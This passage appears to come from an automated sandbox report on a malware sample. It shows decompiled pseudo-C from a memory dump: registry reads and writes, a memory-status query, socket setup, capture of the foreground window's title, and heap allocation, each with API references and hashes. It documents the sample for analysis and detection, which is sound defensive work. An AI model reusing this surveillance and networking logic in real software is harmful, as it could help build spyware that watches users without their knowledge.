                    					RegCloseKey(_v8); // executed
                    					_t21 = _t23;
                    					if(_t16 != 0) {
                    						L4:
                    						_push(0x465094);
                    					} else {
                    						_push( &_v1036);
                    					}
                    				}
                    				E00402093(_t19, _t21, _t22, _t26);
                    				return _t23;
                    			}













                    0x00413154
                    0x00413162
                    0x00413171
                    0x00413178
                    0x00413180
                    0x004131b5
                    0x00000000
                    0x00413182
                    0x00413195
                    0x004131a0
                    0x004131a6
                    0x004131aa
                    0x004131b7
                    0x004131b7
                    0x004131ac
                    0x004131b2
                    0x004131b2
                    0x004131aa
                    0x004131bc
                    0x004131c8

                    APIs
                    • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413178
                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413195
                    • RegCloseKey.KERNEL32(?), ref: 004131A0
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: e5e52fd597079134c456ca0714bf91a3bc698f1f98901aaa5ad8907689e192da
                    • Instruction ID: 8c8508a9fd6a07c5d29d176df1c482b8744531ee4c8cce2ade5092195144b22e
                    • Opcode Fuzzy Hash: e5e52fd597079134c456ca0714bf91a3bc698f1f98901aaa5ad8907689e192da
                    • Instruction Fuzzy Hash: 6A01A27A900218BBCB209B91DC08DEF7B7DDB44751F0400AABB05B2240DA748E499BA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004132A6(char* __edx, char* _a4, char* _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
                    				void* _v12;
                    				char _v1040;
                    				long _t14;
                    				long _t17;
                    
                    				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v12); // executed
                    				if(_t14 != 0) {
                    					L3:
                    					return 0;
                    				}
                    				_t17 = RegQueryValueExA(_v12, _a4, 0, 0, _a8,  &_a12); // executed
                    				RegCloseKey(_v12); // executed
                    				if(_t17 != 0) {
                    					goto L3;
                    				}
                    				E00406BDE( &_v1040, _a16, _a20);
                    				E00406C63( &_v1040, _a8, _a12);
                    				return 1;
                    			}







                    0x004132c2
                    0x004132ca
                    0x00413316
                    0x00000000
                    0x00413316
                    0x004132db
                    0x004132e6
                    0x004132ee
                    0x00000000
                    0x00000000
                    0x004132fc
                    0x0041330d
                    0x00000000

                    APIs
                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742D8), ref: 004132C2
                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 004132DB
                    • RegCloseKey.KERNEL32(00000000), ref: 004132E6
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: 5d27ed05781a484b4b72d93fdc3ca2636a50cc12cd5a20ab231305e9849e699c
                    • Instruction ID: 6531e35a7f7a8811fe0fcebe2a25229c74a31c32919171b2b41f12579a12ddb2
                    • Opcode Fuzzy Hash: 5d27ed05781a484b4b72d93fdc3ca2636a50cc12cd5a20ab231305e9849e699c
                    • Instruction Fuzzy Hash: 4901AD3180022DBBCF215FA1DC49DEB3F39EF05761F004165BE0862061DB358AA9EBE8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004130F7(char* __edx, char* _a4, char* _a8) {
                    				void* _v8;
                    				int _v12;
                    				int _v16;
                    				int _t12;
                    				long _t14;
                    				long _t18;
                    				signed int _t19;
                    
                    				_t12 = 4;
                    				_v12 = _t12;
                    				_v16 = _t12;
                    				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
                    				if(_t14 != 0) {
                    					return 0;
                    				}
                    				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12); // executed
                    				_t19 = RegCloseKey(_v8); // executed
                    				return _t19 & 0xffffff00 | _t18 == 0x00000000;
                    			}










                    0x004130ff
                    0x00413100
                    0x00413103
                    0x00413117
                    0x0041311f
                    0x00000000
                    0x0041314e
                    0x00413135
                    0x00413140
                    0x00000000

                    APIs
                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413117
                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742D8), ref: 00413135
                    • RegCloseKey.KERNEL32(?), ref: 00413140
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: df3426101ba58070bd073128819021a2246e40da210b4e6b28afaf2dac1fc239
                    • Instruction ID: 99fca689d26be82ec8aa5faf82d103d1d5c045ec972758aa869f870d9f7a3105
                    • Opcode Fuzzy Hash: df3426101ba58070bd073128819021a2246e40da210b4e6b28afaf2dac1fc239
                    • Instruction Fuzzy Hash: 79F01D7690020CBFDF109FE09D05FEE7BBCEB04B11F1040A6BA08F6191DA359B589B94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004130AD(void* __ecx, char* __edx, char* _a4) {
                    				void* _v8;
                    				long _t8;
                    				signed int _t9;
                    				long _t10;
                    				signed int _t11;
                    
                    				_t8 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
                    				if(_t8 != 0) {
                    					_t9 = 0;
                    				} else {
                    					_t10 = RegQueryValueExA(_v8, _a4, 0, 0, 0, 0); // executed
                    					_t11 = RegCloseKey(_v8); // executed
                    					_t9 = _t11 & 0xffffff00 | _t10 == 0x00000000;
                    				}
                    				return _t9;
                    			}








                    0x004130c4
                    0x004130cc
                    0x004130f0
                    0x004130ce
                    0x004130d8
                    0x004130e3
                    0x004130eb
                    0x004130eb
                    0x004130f6

                    APIs
                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C011,00465C30), ref: 004130C4
                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C011,00465C30), ref: 004130D8
                    • RegCloseKey.KERNEL32(?,?,?,0040C011,00465C30), ref: 004130E3
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: 1075fb06136e35a7ed81a0e64d7f3566a18b73378cd2fee6066832498a167b71
                    • Instruction ID: 103e4923bf8ec38e42363886dbb3a2af8300b3d3c3b3414aa56d664b97fbc672
                    • Opcode Fuzzy Hash: 1075fb06136e35a7ed81a0e64d7f3566a18b73378cd2fee6066832498a167b71
                    • Instruction Fuzzy Hash: 83E06531801238BBDB204FA29C0EEEB7FACDF0ABA1B014155BD08A1111DE358E54E6F4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00413425(void* __ecx, char* __edx, char* _a4, char _a8) {
                    				void* _v8;
                    				long _t9;
                    				long _t12;
                    
                    				_t9 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
                    				if(_t9 != 0) {
                    					return 0;
                    				}
                    				_t12 = RegSetValueExA(_v8, _a4, 0, 4,  &_a8, 4); // executed
                    				return RegCloseKey(_v8) & 0xffffff00 | _t12 == 0x00000000;
                    			}






                    0x00413433
                    0x0041343b
                    0x00000000
                    0x00413467
                    0x0041344e
                    0x00000000

                    APIs
                    • RegCreateKeyA.ADVAPI32(80000001,00000000,00465094), ref: 00413433
                    • RegSetValueExA.KERNEL32(00465094,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040BFC7,00465C30,00000001,000000AF,00465094), ref: 0041344E
                    • RegCloseKey.ADVAPI32(00465094,?,?,?,0040BFC7,00465C30,00000001,000000AF,00465094), ref: 00413459
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID:
                    • API String ID: 1818849710-0
                    • Opcode ID: 905e3aa7f8f162462565f03b43b06370a383f2ceba138699d2f61621e6a7c42b
                    • Instruction ID: 035bd9da835c8ecb881c4e27b23ab6127e1ebe9b8a7be84876f51cc12b124983
                    • Opcode Fuzzy Hash: 905e3aa7f8f162462565f03b43b06370a383f2ceba138699d2f61621e6a7c42b
                    • Instruction Fuzzy Hash: 64E06572540308FFDF119F919C05FEA7B6CDB04B52F114065BF05A61A1DA758E149B94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00409D0B(void* __ebx, void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a28) {
                    				char _v32;
                    				char _v56;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t23;
                    				void* _t24;
                    				void* _t34;
                    				intOrPtr _t55;
                    				void* _t62;
                    				void* _t64;
                    
                    				_t37 = __ebx;
                    				_t62 = __ecx;
                    				 *((intOrPtr*)(__ecx + 0x4c)) = _a4;
                    				 *((intOrPtr*)(__ecx + 0x50)) = _a8;
                    				_t23 = E0043B4CB(_a16);
                    				_t55 = _a12;
                    				if(_t23 != 0) {
                    					_t24 = E0040D83D( &_v32, _t55, _a16); // executed
                    					E00401F13(0x474158, _t55, _t62, _t24);
                    					E00401F09();
                    					E00401F13(_t62 + 0x68, _t27, _t62, E00403014(__ebx,  &_v32, E00409082( &_v56, 0x474158, _t64, "\\"), 0x474158, _t64, __eflags, _a20));
                    					E00401F09();
                    				} else {
                    					E00401F13(_t62 + 0x68, _t55, _t62, E0040D83D( &_v32, _t55, _a20));
                    				}
                    				E00401F09();
                    				 *0x47418c =  *0x47418c & 0x00000000;
                    				 *0x474188 = _a24 * 0x3e8;
                    				 *0x474123 = _a28; // executed
                    				_t34 = E0040A030(_t37, _t62,  *0x47418c); // executed
                    				return _t34;
                    			}














                    0x00409d0b
                    0x00409d15
                    0x00409d1b
                    0x00409d21
                    0x00409d24
                    0x00409d29
                    0x00409d32
                    0x00409d4e
                    0x00409d5c
                    0x00409d64
                    0x00409d8b
                    0x00409d93
                    0x00409d34
                    0x00409d41
                    0x00409d46
                    0x00409d9b
                    0x00409da9
                    0x00409db0
                    0x00409db8
                    0x00409dbd
                    0x00409dc7

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcslen
                    • String ID: XAG
                    • API String ID: 176396367-2620656749
                    • Opcode ID: df1fe647757a78b5a262fb31304d4f49d8a0fa05c05cb2d2e2eddfccf34de737
                    • Instruction ID: ae9558201639a585c6aae7650b162317f9b6116fca8cf1865b26d9496c35f332
                    • Opcode Fuzzy Hash: df1fe647757a78b5a262fb31304d4f49d8a0fa05c05cb2d2e2eddfccf34de737
                    • Instruction Fuzzy Hash: F311A8319002095BCB15FF65D8519EE7BB9EF54314B10403FF456622E2EF389955CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041B24B(intOrPtr* __ecx) {
                    				struct _MEMORYSTATUSEX _v68;
                    				intOrPtr _t8;
                    
                    				_v68.dwLength = 0x40;
                    				GlobalMemoryStatusEx( &_v68); // executed
                    				 *__ecx = _v68.ullTotalPhys;
                    				_t8 = _v68.ullAvailPhys;
                    				 *((intOrPtr*)(__ecx + 4)) = _t8;
                    				return _t8;
                    			}





                    0x0041b255
                    0x0041b25f
                    0x0041b268
                    0x0041b26a
                    0x0041b26d
                    0x0041b274

                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B25F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: GlobalMemoryStatus
                    • String ID: @
                    • API String ID: 1890195054-2766056989
                    • Opcode ID: 975c99f648484304f0484cad80fc38577f2185ed9324c444da12de6065e7f479
                    • Instruction ID: 38de79aa629117dcd4434e64b80d94e664664b2e1bb899292eaeec732f23a48c
                    • Opcode Fuzzy Hash: 975c99f648484304f0484cad80fc38577f2185ed9324c444da12de6065e7f479
                    • Instruction Fuzzy Hash: EBD017B58023189FC720DFA8E805A8DBBFCEB08210F00456AEC89E3700E770E9008B84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E0040482D(char* __ecx) {
                    				intOrPtr _t14;
                    				char _t16;
                    				char* _t22;
                    
                    				_t22 = __ecx;
                    				if( *0x471abb != 0 || E0040489E() != 0) {
                    					_t14 =  *0x471adc; // 0x7be108
                    					_t1 = _t14 + 4; // 0x2, executed
                    					__imp__#23( *_t1, 1, 6); // executed
                    					 *((intOrPtr*)(_t22 + 4)) = _t14;
                    					if(_t14 == 0xffffffff) {
                    						goto L2;
                    					} else {
                    						_t16 =  *0x471ae4; // 0x0
                    						 *((char*)(_t22 + 0x5c)) = 0;
                    						 *((intOrPtr*)(_t22 + 0x60)) = 0;
                    						 *((intOrPtr*)(_t22 + 0x58)) = 0x3e8;
                    						 *((char*)(_t22 + 0x7d)) = 0;
                    						 *((char*)(_t22 + 1)) = _t16;
                    						 *((intOrPtr*)(_t22 + 0x4c)) = 0;
                    						 *((intOrPtr*)(_t22 + 0x50)) = 0;
                    						 *((intOrPtr*)(_t22 + 0x68)) = 0;
                    						 *((intOrPtr*)(_t22 + 0x70)) = 0;
                    						 *((intOrPtr*)(_t22 + 0x6c)) = 0;
                    						 *((intOrPtr*)(_t22 + 0x68)) = CreateEventW(0, 0, 1, 0);
                    						 *_t22 = 1;
                    						return 1;
                    					}
                    				} else {
                    					L2:
                    					return 0;
                    				}
                    			}






                    0x00404835
                    0x00404837
                    0x00404846
                    0x0040484f
                    0x00404852
                    0x00404858
                    0x0040485e
                    0x00000000
                    0x00404860
                    0x00404860
                    0x0040486c
                    0x0040486f
                    0x00404872
                    0x00404879
                    0x0040487c
                    0x0040487f
                    0x00404882
                    0x00404885
                    0x00404888
                    0x0040488b
                    0x00404894
                    0x00404899
                    0x0040489d
                    0x0040489d
                    0x00404842
                    0x00404842
                    0x00404845
                    0x00404845

                    APIs
                    • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,?,00000000,0040D0AB,?,?,?,?,0040522E), ref: 0040488E
                      • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateEventStartupsocket
                    • String ID:
                    • API String ID: 1953588214-0
                    • Opcode ID: e718a62e8f20a3a55f00e340ea04b385c9248e3979de558870aa415854fe3046
                    • Instruction ID: 9b69457a68ef8379d8a932d61a8c24ecd47333491218c68b15f3cc5d3d7ae0b4
                    • Opcode Fuzzy Hash: e718a62e8f20a3a55f00e340ea04b385c9248e3979de558870aa415854fe3046
                    • Instruction Fuzzy Hash: 2601BCB1408B808FD7349F38A8456977FE0AB16304F048D6EF1CAA7BA1D7B4A481CB18
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 66%
                    			E0040165E(signed int _a4, signed int _a8, char _a12) {
                    				intOrPtr _v12;
                    				char _v16;
                    				intOrPtr _v28;
                    				char _v32;
                    				char _v48;
                    				void* __esi;
                    				signed int _t21;
                    				signed int _t22;
                    				signed int _t24;
                    				intOrPtr _t40;
                    				signed int _t42;
                    				signed int _t43;
                    				signed int _t45;
                    				char* _t48;
                    				signed int _t53;
                    				char* _t55;
                    				void* _t57;
                    				void* _t58;
                    				void* _t61;
                    				void* _t62;
                    				void* _t64;
                    				void* _t65;
                    
                    				_t42 = _a4;
                    				if(_t42 != 0) {
                    					_t22 = _t21 | 0xffffffff;
                    					_t53 = _t22 % _a8;
                    					__eflags = _t22 / _a8 - _t42;
                    					if(_t22 / _a8 >= _t42) {
                    						_t43 = _t42 * _a8;
                    						__eflags = _a12;
                    						if(__eflags == 0) {
                    							L8:
                    							_t24 = E00433F08(_t53, _t57, __eflags, _t43); // executed
                    							_t45 = _t24;
                    							goto L9;
                    						} else {
                    							__eflags = _t43 - 0x1000;
                    							if(__eflags < 0) {
                    								goto L8;
                    							} else {
                    								_t10 = _t43 + 0x23; // 0x40f630
                    								_t26 = _t10;
                    								__eflags = _t10 - _t43;
                    								if(__eflags <= 0) {
                    									goto L3;
                    								} else {
                    									_t40 = E00433F08(_t53, _t57, __eflags, _t26);
                    									_t11 = _t40 + 0x23; // 0x23
                    									_t45 = _t11 & 0xffffffe0;
                    									 *((intOrPtr*)(_t45 - 4)) = _t40;
                    									L9:
                    									return _t45;
                    								}
                    							}
                    						}
                    					} else {
                    						L3:
                    						_t61 = _t64;
                    						_t65 = _t64 - 0xc;
                    						E004345DB( &_v16);
                    						E00438B36( &_v16, 0x46d3dc);
                    						asm("int3");
                    						_push(_t61);
                    						_t62 = _t65;
                    						E00434BE6( &_v32, _v12);
                    						E00438B36( &_v32, 0x46d46c);
                    						asm("int3");
                    						_push(_t62);
                    						_t48 =  &_v48;
                    						E00434C3D(_t48, _v28);
                    						E00438B36( &_v48, 0x46d4a8);
                    						asm("int3");
                    						_t55 = _t48;
                    						__eflags = 1;
                    						asm("lock xadd [0x470024], eax");
                    						if(1 == 0) {
                    							_push(_t57);
                    							_t58 = 0x471060;
                    							do {
                    								E00435595(_t58);
                    								_t58 = _t58 + 0x18;
                    								__eflags = _t58 - 0x471120;
                    							} while (_t58 < 0x471120);
                    						}
                    						return _t55;
                    					}
                    				} else {
                    					return 0;
                    				}
                    			}

























                    0x0040165e
                    0x00401664
                    0x00401669
                    0x0040166e
                    0x00401672
                    0x00401674
                    0x0040167b
                    0x00401680
                    0x00401685
                    0x004016a8
                    0x004016a9
                    0x004016af
                    0x00000000
                    0x00401687
                    0x00401687
                    0x0040168d
                    0x00000000
                    0x0040168f
                    0x0040168f
                    0x0040168f
                    0x00401692
                    0x00401694
                    0x00000000
                    0x00401696
                    0x00401697
                    0x0040169d
                    0x004016a0
                    0x004016a3
                    0x004016b1
                    0x004016b3
                    0x004016b3
                    0x00401694
                    0x0040168d
                    0x00401676
                    0x00401676
                    0x00434c8c
                    0x00434c8e
                    0x00434c94
                    0x00434ca2
                    0x00434ca7
                    0x00434ca8
                    0x00434ca9
                    0x00434cb4
                    0x00434cc2
                    0x00434cc7
                    0x00434cc8
                    0x00434cce
                    0x00434cd4
                    0x00434ce2
                    0x00434ce7
                    0x00434ceb
                    0x00434ced
                    0x00434cee
                    0x00434cf6
                    0x00434cf8
                    0x00434cf9
                    0x00434cfe
                    0x00434cff
                    0x00434d04
                    0x00434d08
                    0x00434d08
                    0x00434d10
                    0x00434d14
                    0x00434d14
                    0x00401666
                    0x00401668
                    0x00401668

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e82af9f8375c7ff28643a96052226e790dff0d99bbabfcea1cbc6c8406cd754d
                    • Instruction ID: cedaad505b722357fe177a98131203d5442c181f1b5af8110a79c98507b42515
                    • Opcode Fuzzy Hash: e82af9f8375c7ff28643a96052226e790dff0d99bbabfcea1cbc6c8406cd754d
                    • Instruction Fuzzy Hash: 52F0E2706152016ADB0C8B34CC50B2A3B994B84316FA48F3FF01AD61E0D73ED8918A0D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041B52B(void* __ebx, void* __ecx, void* __edi) {
                    				short _v516;
                    				void* __ebp;
                    				struct HWND__* _t6;
                    				void* _t15;
                    				void* _t17;
                    				void* _t18;
                    
                    				_t17 = __ecx;
                    				E004368A0(__edi,  &_v516, 0, 0x200);
                    				_t6 = GetForegroundWindow(); // executed
                    				GetWindowTextW(_t6,  &_v516, 0x100);
                    				E0040417E(__ebx, _t17, _t15, _t18,  &_v516);
                    				return _t17;
                    			}









                    0x0041b543
                    0x0041b545
                    0x0041b54d
                    0x0041b560
                    0x0041b56f
                    0x0041b57a

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$ForegroundText
                    • String ID:
                    • API String ID: 29597999-0
                    • Opcode ID: d901945544aa0d71be8a044b320c2f580efb9c3b9706ec528108dfbeef2dd9a0
                    • Instruction ID: deb5690ef24754c159d454fb9bb47376badec5d8fa97606646e92ca94d27cd4b
                    • Opcode Fuzzy Hash: d901945544aa0d71be8a044b320c2f580efb9c3b9706ec528108dfbeef2dd9a0
                    • Instruction Fuzzy Hash: 85E0D17190031827EB20A7A49C4EFD5776CE704715F0400EDB918D31C2DD75990487D4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E00445B29(void* __ecx, long _a4) {
                    				void* __esi;
                    				void* _t4;
                    				void* _t6;
                    				void* _t7;
                    				long _t8;
                    
                    				_t7 = __ecx;
                    				_t8 = _a4;
                    				if(_t8 > 0xffffffe0) {
                    					L7:
                    					 *((intOrPtr*)(E0043FFBD())) = 0xc;
                    					__eflags = 0;
                    					return 0;
                    				}
                    				if(_t8 == 0) {
                    					_t8 = _t8 + 1;
                    				}
                    				while(1) {
                    					_t4 = RtlAllocateHeap( *0x471a5c, 0, _t8); // executed
                    					if(_t4 != 0) {
                    						break;
                    					}
                    					__eflags = E00444F37();
                    					if(__eflags == 0) {
                    						goto L7;
                    					}
                    					_t6 = E00442960(_t7, _t8, __eflags, _t8);
                    					_pop(_t7);
                    					__eflags = _t6;
                    					if(_t6 == 0) {
                    						goto L7;
                    					}
                    				}
                    				return _t4;
                    			}








                    0x00445b29
                    0x00445b2f
                    0x00445b35
                    0x00445b67
                    0x00445b6c
                    0x00445b72
                    0x00000000
                    0x00445b72
                    0x00445b39
                    0x00445b3b
                    0x00445b3b
                    0x00445b52
                    0x00445b5b
                    0x00445b63
                    0x00000000
                    0x00000000
                    0x00445b43
                    0x00445b45
                    0x00000000
                    0x00000000
                    0x00445b48
                    0x00445b4d
                    0x00445b4e
                    0x00445b50
                    0x00000000
                    0x00000000
                    0x00445b50
                    0x00000000

                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,00434CD9,?,?,00438257,?,?,pth_unenc,?,?,0040DC6B,00434CD9,?,?,?,?), ref: 00445B5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 690a72a2d7a6cc53d9b8fc0f0c317f9e24140a874638c1b42e91c7e139bcba20
                    • Instruction ID: e08f6dbd41a37af83cdf4e4a1175c731ee0434fa9ed9b2fdc261702dfc536f81
                    • Opcode Fuzzy Hash: 690a72a2d7a6cc53d9b8fc0f0c317f9e24140a874638c1b42e91c7e139bcba20
                    • Instruction Fuzzy Hash: 49E06531A01A9567FE212A669C01B6BB68CDF417A4F190137FC45A6292CF68EC0045EE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Startup
                    • String ID:
                    • API String ID: 724789610-0
                    • Opcode ID: b6e71292727a8e8726e51dddb9d880e8921d66ce6dd40d78292865235398cf16
                    • Instruction ID: 2a26baa4a84a65146bd4256cf3e1e68fe1e3fdb68be2b52c3c037ccc1c9bf716
                    • Opcode Fuzzy Hash: b6e71292727a8e8726e51dddb9d880e8921d66ce6dd40d78292865235398cf16
                    • Instruction Fuzzy Hash: BED012325597484EE620AAB9AC0FCA4776CC313615F0003BA6CB5835E3FA51571CC6BB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E00407BBE(char* __edx, void* __eflags, intOrPtr _a4) {
                    				char _v268;
                    				char _v396;
                    				char _v400;
                    				char _v416;
                    				void* _v420;
                    				char _v424;
                    				char _v432;
                    				char _v440;
                    				char _v444;
                    				char _v448;
                    				char _v468;
                    				char _v476;
                    				char _v480;
                    				void* _v488;
                    				char _v492;
                    				char _v496;
                    				char _v504;
                    				char _v512;
                    				char _v516;
                    				char _v520;
                    				void* _v524;
                    				char _v528;
                    				char _v536;
                    				char _v540;
                    				char _v544;
                    				char _v548;
                    				char _v552;
                    				char _v556;
                    				char _v560;
                    				char _v564;
                    				char _v568;
                    				char _v572;
                    				char _v576;
                    				void* _v588;
                    				void* _v596;
                    				char _v600;
                    				char _v612;
                    				char _v620;
                    				char _v624;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t166;
                    				int _t182;
                    				void* _t186;
                    				void* _t190;
                    				void* _t198;
                    				int _t200;
